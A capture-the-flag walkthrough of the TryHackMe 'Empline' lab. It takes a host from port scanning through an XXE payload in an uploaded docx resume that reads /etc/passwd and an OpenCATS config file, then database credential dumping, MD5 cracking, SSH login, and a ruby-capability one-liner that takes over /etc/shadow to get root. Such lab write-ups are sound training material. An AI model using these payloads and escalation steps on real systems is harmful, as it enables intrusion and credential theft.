Recon
Portscanning
command:sudo nmap -A 10.10.106.137 -T4 -v -p-
# Nmap 7.93 scan initiated Fri May 12 10:05:36 2023 as: nmap -A -T4 -v -p- -oN empline 10.10.106.137
Increasing send delay for 10.10.106.137 from 0 to 5 due to 1308 out of 3269 dropped probes since last increase.
Increasing send delay for 10.10.106.137 from 5 to 10 due to 21 out of 52 dropped probes since last increase.
Nmap scan report for 10.10.106.137
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c0d541eea4d0830c970d75cc7b107f76 (RSA)
| 256 8382f969197d0d5c5365d554f645db74 (ECDSA)
|_ 256 4f913e8b696909700e8226285c8471c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Empline
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
3306/tcp open mysql MySQL 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
| Thread ID: 86
| Capabilities flags: 63487
| Some Capabilities: ODBCClient, ConnectWithDatabase, SupportsCompression, Support41Auth, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, IgnoreSpaceBeforeParenthesis, LongPassword, FoundRows, Speaks41ProtocolNew, LongColumnFlag, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: 5;i!dU\NT:ceP@2x)_'@
|_ Auth Plugin Name: mysql_native_password
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=5/12%OT=22%CT=1%CU=41084%PV=Y%DS=2%DC=T%G=Y%TM=645E054
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=Z%TS=A)SEQ(SP=1
OS:04%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M506ST11NW6%O2=M506ST11NW6%O
OS:3=M506NNT11NW6%O4=M506ST11NW6%O5=M506ST11NW6%O6=M506ST11)WIN(W1=F4B3%W2=
OS:F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M506NNSN
OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 41.098 days (since Sat Apr 1 08:01:26 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 164.08 ms 10.18.0.1
2 173.72 ms 10.10.106.137
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 12 10:22:16 2023 -- 1 IP address (1 host up) scanned in 999.52 seconds
From our scan we have 3 opened ports. Port 22 which runs ssh, port 80 which runs http and port 3306 which runs mysql. We’ll be starting our enumeration today from port 80.
Enumeration (Port 80)
Going to the webpage, you get this
Lets try to fuzz for directories using ffuf
command:ffuf -u "http://10.10.106.137/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -e .zip,.sql,.php,.phtml,.bak,.backup
┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ ffuf -u "http://10.10.106.137/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -e .zip,.sql,.php,.phtml,.bak,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.106.137/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
:: Extensions : .zip .sql .php .phtml .bak .backup
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
assets [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 231ms]
javascript [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 394ms]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 175ms]
:: Progress: [140812/140812] :: Job [1/1] :: 175 req/sec :: Duration: [0:11:55] :: Errors: 0 ::
oops, there was nothing here actually. Lets move on to viewing the source page
We found a subdomain job.empline.thm in the source page. Lets go ahead and add this to our /etc/hosts/ file.
Navigating to the subdomain page should get you this
This webpage is running on opencats 0.9.4. Lets try to look for exploits
So, we can perform a 'docx ' XML External Entity Injection (XXE) attack on this. This is the first time I’ll be seeing this though hehe. Since we found the vulnerability, lets go ahead and exploit it😎
Exploitation (Port 80)
If you recall in the source page we saw this link http://job.empline.thm/careers. Lets navigate to that link
Checking arounf the webpage, I found an upload page
We are required to upload our resume, this accepts a docx and an odt file. Well, this is exactly what we want😂.
We are going to make use of this blog to exploit this vulnerability. Lets get started
#!/usr/bin/env python
from docx import Document
document=Document()
paragraph=document.add_paragraph('BlackAnon')
document.save('resume.docx')
Save this python script into a file lets say abeg.py. What this script does is that it uses the “docx” module to create a new Word document, add a paragraph containing the text “BlackAnon”, and save the document as a file named “resume.docx” in the current working directory.
Lets save this and run it
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/TryHackMe/empline]
└─$ nano abeg.py
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/TryHackMe/empline]
└─$ python abeg.py
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/TryHackMe/empline]
└─$ ls
abeg.py empline resume.docx
As you can see, it generated a docx file resume.docx. Lets upload this resume
cool hehe, now this docx file isn’t malicious because what it does is print a name.
A docx file is mostly just zipped up xml files. We need to unzip the resume.docx file and modify the contents in word/document.xm. Then, save our changes back to resume.docx.
command:unzip resume.docx
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/TryHackMe/empline]
└─$ unzip resume.docx
Archive: resume.docx
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: docProps/core.xml
inflating: docProps/app.xml
inflating: word/document.xml
inflating: word/_rels/document.xml.rels
inflating: word/styles.xml
inflating: word/stylesWithEffects.xml
inflating: word/settings.xml
inflating: word/webSettings.xml
inflating: word/fontTable.xml
inflating: word/theme/theme1.xml
inflating: customXml/item1.xml
inflating: customXml/_rels/item1.xml.rels
inflating: customXml/itemProps1.xml
inflating: word/numbering.xml
inflating: docProps/thumbnail.jpeg
We’ll be modifying the word/document.xml file. We’ll be making two modifications. For the fitst one add this payload <!DOCTYPE message [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]> under line one to read the etc/passwd file
Now, for the second modification, we need to find and change BlackAnon which was the content of the resume to &xxe;
We are done with the modificatons. To save the modifications to the resume.docx file, we have to zip it
command:zip resume.docx word/document.xml
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/TryHackMe/empline]
└─$ zip resume.docx word/document.xml
updating: word/document.xml (deflated 65%)
Lets try to upload this again. All things being equal we should be able to view the /etc/passwd file
Nice😎. To read the Opencats config.php file to recover plaintext passwords, we will need to base64 encode the contents.
payload:<!DOCTYPE message [<!ENTITY xxe SYSTEM 'php://filter/convert.base64-encode/resource=config.php'>]>
To save the modifications we have to zip the resume.docx file again
command:zip resume.docx word/document.xml
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/TryHackMe/empline]
└─$ zip resume.docx word/document.xml
updating: word/document.xml (deflated 64%)
Lets try to upload this file again
We got something in base64. Lets try to decode this using cyberchef.
/* Database configuration. */
define('DATABASE_USER', 'james');
define('DATABASE_PASS', 'ng6pUFvsGNtw');
define('DATABASE_HOST', 'localhost');
define('DATABASE_NAME', 'opencats');
So, we got credentials for the mysql database which runs on port 3306. Lets try to enumerate that port
Enumeration (Port 3306)
Since we have credentials for the database, we can go ahead and log in
username:james password:ng6pUFvsGNtw
command:mysql -h 10.10.106.137 -u james -p
We are logged in. Now, lets go ahead and dump the database
commands:
show databases;
use opencats
show tables;
select user_id,user_name,password from user;
Running the last command should show you this
MariaDB [opencats]> select user_id,user_name,password from user;
+---------+----------------+----------------------------------+
| user_id | user_name | password |
+---------+----------------+----------------------------------+
| 1 | admin | b67b5ecc5d8902ba59c65596e4c053ec |
| 1250 | cats@rootadmin | cantlogin |
| 1251 | george | 86d0dfda99dbebc424eb4407947356ac |
| 1252 | james | e53fbdb31890ff3bc129db0e27c473c9 |
+---------+----------------+----------------------------------+
4 rows in set (0.172 sec)
Lets save the passwords and usernames in a file. At this point we’ll be inviting “John The Ripper” to help us out in cracking the passwords hehe.
First, we have to determine the password hash. The tool we’ll be using for this is hash-identifier. Well, it comes preinstalled with kali linux
command:hash-identifier
Okay, so it is MD5.
Using John,
command:john abeg --wordlist=/home/bl4ck4non/Documents/rockyou.txt --format=RAW-md5
One of the passwords got cracked. Well, all thanks to John😁.
If you recall, from our nmap scan we had the ssh service running. We’ll be trying the creds we found for the ssh server.
username:george password:pretonnevippasempre
command:ssh george@10.10.106.137
Now that we are logged in. Lets go ahead and escalate our privileges.
Privilege Escalation
Checking for linux capabilities
command:getcap -r / 2>/dev/null
Now, this looks sus. Why?? This is because the ruby binary with this capability, can change the owner of the shadow file, change root password, and escalate privileges.
We’ll be using a one liner command to change the permission of the /etc/shadow file to user george.
command:ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
First, lets get the user ID and group ID for user george
command:id
From the above screenshot we can see that the user ID is 1002 and the group ID is 1002. With this we can modify the one liner command by making use of george’s user ID and group ID.
command:ruby -e 'require "fileutils"; FileUtils.chown(1002, 1002, "/etc/shadow")
Before running the command
After running the command
What this means is that we now own the /etc/shadow file. What we’ll be doing is changing the root’s password. To do this we will generate a new password using openssl
command:openssl passwd 1234567890
┌──(bl4ck4non㉿bl4ck4non)-[~]
└─$ openssl passwd 1234567890
$1$BZixveX4$uyaYj/0LEg6nsrY4ikdu41
We’ll be replacing the root’s hash password with the newly generated password. You can use any text editor of your choice hehe. I’ll be using nano.
Now, that we have successfully changed the root’s user password, we can switch user to root user using the password 1234567890
command:su root
cool, we are now logged in as the root user😎.
That will be all for today
Back To Home